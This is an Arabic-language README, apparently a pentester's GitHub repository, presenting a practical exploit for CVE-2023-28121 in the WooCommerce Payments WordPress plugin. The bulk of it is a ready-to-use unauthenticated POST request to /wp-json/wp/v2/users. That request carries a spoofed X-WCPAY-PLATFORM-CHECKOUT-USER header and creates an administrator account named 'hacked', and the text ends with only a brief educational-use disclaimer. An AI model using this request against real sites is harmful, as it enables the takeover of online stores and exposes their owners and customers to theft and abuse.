
استغلال عملي لثغرة أمنية حرجة في ووردبريس باستخدام إضافة WooCommerce Payments.
استغلال عملي لثغرة حرجة في ووردبريس باستخدام إضافة WooCommerce Payments.
تسمح CVE-2023-28121 بإنشاء مستخدمين مسؤولين دون مصادقة عبر REST API.
📊 تمتلك الإضافة المتأثرة مئات الآلاف من التثبيتات، وتُستخدم على نطاق واسع في المتاجر الإلكترونية.
https://github.com/user-attachments/assets/cead3884-0924-4320-967f-de9fb3f6cd44
يقبل النظام عنوانًا يمكن التلاعب به:
X-WCPAY-PLATFORM-CHECKOUT-USER: 1
وبذلك، يمكن إرسال طلب لإنشاء مستخدم بصلاحيات مرتفعة دون مصادقة صالحة.
POST /wp-json/wp/v2/users
Content-Type: application/json
X-WCPAY-PLATFORM-CHECKOUT-USER: 1
{
"username": "hacked",
"password": "StrongPass123!",
"email": "[email protected]",
"roles": ["administrator"]
}
✔️ النتيجة: إنشاء مستخدم مسؤول
/wp-admin👨💻 المؤلف
Luis Eduardo .M.B.S.R
Pentester / أمان الويب
LinkedIn: https://www.linkedin.com/in/luis-eduardo-ti/
GitHub: https://github.com/luisdevpentest
استخدام تعليمي في بيئة خاضعة للرقابة. لا أتحمل مسؤولية كيفية استخدام هذه المعرفة من قبل أطراف ثالثة.